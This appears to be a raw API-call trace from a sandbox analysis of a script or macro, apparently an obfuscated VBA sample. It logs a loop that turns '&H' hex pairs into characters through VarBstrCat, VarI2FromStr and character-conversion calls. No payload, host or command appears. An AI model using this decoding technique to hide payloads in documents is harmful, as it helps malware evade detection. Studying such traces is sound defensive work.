GetUserDefaultLCID () returned 0x409 [0174.993] malloc (_Size=0xa0) returned 0x11f50080 [0174.994] free (_Block=0x11f50080) [0174.994] VarBstrCat (in: bstrLeft="&H", bstrRight="9f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.994] GetUserDefaultLCID () returned 0x409 [0174.994] VarI2FromStr (in: strIn="&H9f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.994] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0174.994] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.994] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.994] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.994] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.995] GetUserDefaultLCID () returned 0x409 [0174.995] malloc (_Size=0xa0) returned 0x11f50080 [0174.995] free (_Block=0x11f50080) [0174.995] VarBstrCat (in: bstrLeft="&H", bstrRight="b7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.995] GetUserDefaultLCID () returned 0x409 [0174.995] VarI2FromStr (in: strIn="&Hb7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.995] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0174.995] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.995] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.996] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.996] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.996] GetUserDefaultLCID () returned 0x409 [0174.996] malloc (_Size=0xa0) returned 0x11f50080 [0174.996] free (_Block=0x11f50080) [0174.999] VarBstrCat (in: bstrLeft="&H", bstrRight="c6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.999] GetUserDefaultLCID () returned 0x409 [0174.999] VarI2FromStr (in: strIn="&Hc6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.999] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0174.999] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.999] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.999] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.999] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.999] GetUserDefaultLCID () returned 0x409 [0174.999] malloc (_Size=0xa0) returned 0x11f50080 [0174.999] free (_Block=0x11f50080) [0175.000] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.000] GetUserDefaultLCID () returned 0x409 [0175.000] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.000] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.000] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.000] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.000] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.000] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.000] GetUserDefaultLCID () returned 0x409 [0175.001] malloc (_Size=0xa0) returned 0x11f50080 [0175.001] free (_Block=0x11f50080) [0175.001] VarBstrCat (in: bstrLeft="&H", bstrRight="cd", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.001] GetUserDefaultLCID () returned 0x409 [0175.001] VarI2FromStr (in: strIn="&Hcd", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.001] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0175.001] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.001] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.002] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.002] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.002] GetUserDefaultLCID () returned 0x409 [0175.002] malloc (_Size=0xa0) returned 0x11f50080 [0175.002] free (_Block=0x11f50080) [0175.002] VarBstrCat (in: bstrLeft="&H", bstrRight="be", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.002] GetUserDefaultLCID () returned 0x409 [0175.002] VarI2FromStr (in: strIn="&Hbe", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.002] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0175.003] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.003] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.003] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.003] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.003] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.003] GetUserDefaultLCID () returned 0x409 [0175.003] malloc (_Size=0xa0) returned 0x11f50080 [0175.003] free (_Block=0x11f50080) [0175.003] VarBstrCat (in: bstrLeft="&H", bstrRight="d4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.003] GetUserDefaultLCID () returned 0x409 [0175.003] VarI2FromStr (in: strIn="&Hd4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.004] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0175.004] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.004] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.004] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.004] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.004] GetUserDefaultLCID () returned 0x409 [0175.004] malloc (_Size=0xa0) returned 0x11f50080 [0175.004] free (_Block=0x11f50080) [0175.004] VarBstrCat (in: bstrLeft="&H", bstrRight="e7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.005] GetUserDefaultLCID () returned 0x409 [0175.005] VarI2FromStr (in: strIn="&He7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.005] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0175.005] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.005] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.005] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.005] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.005] GetUserDefaultLCID () returned 0x409 [0175.005] malloc (_Size=0xa0) returned 0x11f50080 [0175.005] free (_Block=0x11f50080) [0175.006] VarBstrCat (in: bstrLeft="&H", bstrRight="9c", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.006] GetUserDefaultLCID () returned 0x409 [0175.006] VarI2FromStr (in: strIn="&H9c", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.006] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0175.006] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.006] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.006] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.006] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.006] GetUserDefaultLCID () returned 0x409 [0175.006] malloc (_Size=0xa0) returned 0x11f50080 [0175.006] free (_Block=0x11f50080) [0175.007] VarBstrCat (in: bstrLeft="&H", bstrRight="dc", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.007] GetUserDefaultLCID () returned 0x409 [0175.007] VarI2FromStr (in: strIn="&Hdc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.007] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0175.007] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.007] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.007] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.007] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.007] GetUserDefaultLCID () returned 0x409 [0175.008] malloc (_Size=0xa0) returned 0x11f50080 [0175.008] free (_Block=0x11f50080) [0175.008] VarBstrCat (in: bstrLeft="&H", bstrRight="b9", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.008] GetUserDefaultLCID () returned 0x409 [0175.008] VarI2FromStr (in: strIn="&Hb9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.008] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0175.008] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.008] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.009] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.009] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.009] GetUserDefaultLCID () returned 0x409 [0175.009] malloc (_Size=0xa0) returned 0x11f50080 [0175.009] free (_Block=0x11f50080) [0175.009] VarBstrCat (in: bstrLeft="&H", bstrRight="e0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.009] GetUserDefaultLCID () returned 0x409 [0175.009] VarI2FromStr (in: strIn="&He0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.009] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0175.010] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.010] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.010] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.010] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.010] GetUserDefaultLCID () returned 0x409 [0175.010] malloc (_Size=0xa0) returned 0x11f50080 [0175.010] free (_Block=0x11f50080) [0175.010] VarBstrCat (in: bstrLeft="&H", bstrRight="a8", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.010] GetUserDefaultLCID () returned 0x409 [0175.010] VarI2FromStr (in: strIn="&Ha8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.011] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0175.011] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.011] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.011] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.011] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.011] GetUserDefaultLCID () returned 0x409 [0175.011] malloc (_Size=0xa0) returned 0x11f50080 [0175.011] free (_Block=0x11f50080) [0175.011] VarBstrCat (in: bstrLeft="&H", bstrRight="bd", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.012] GetUserDefaultLCID () returned 0x409 [0175.012] VarI2FromStr (in: strIn="&Hbd", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.013] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0175.013] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.013] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.013] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.013] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.013] GetUserDefaultLCID () returned 0x409 [0175.013] malloc (_Size=0xa0) returned 0x11f50080 [0175.013] free (_Block=0x11f50080) [0175.013] VarBstrCat (in: bstrLeft="&H", bstrRight="d3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.013] GetUserDefaultLCID () returned 0x409 [0175.014] VarI2FromStr (in: strIn="&Hd3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.014] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0175.014] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.014] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.014] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.014] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.014] GetUserDefaultLCID () returned 0x409 [0175.014] malloc (_Size=0xa0) returned 0x11f50080 [0175.014] free (_Block=0x11f50080) [0175.015] VarBstrCat (in: bstrLeft="&H", bstrRight="da", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.015] GetUserDefaultLCID () returned 0x409 [0175.015] VarI2FromStr (in: strIn="&Hda", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.015] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0175.015] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.015] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.015] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.015] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.015] GetUserDefaultLCID () returned 0x409 [0175.015] malloc (_Size=0xa0) returned 0x11f50080 [0175.015] free (_Block=0x11f50080) [0175.016] VarBstrCat (in: bstrLeft="&H", bstrRight="ab", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.016] GetUserDefaultLCID () returned 0x409 [0175.016] VarI2FromStr (in: strIn="&Hab", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.016] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 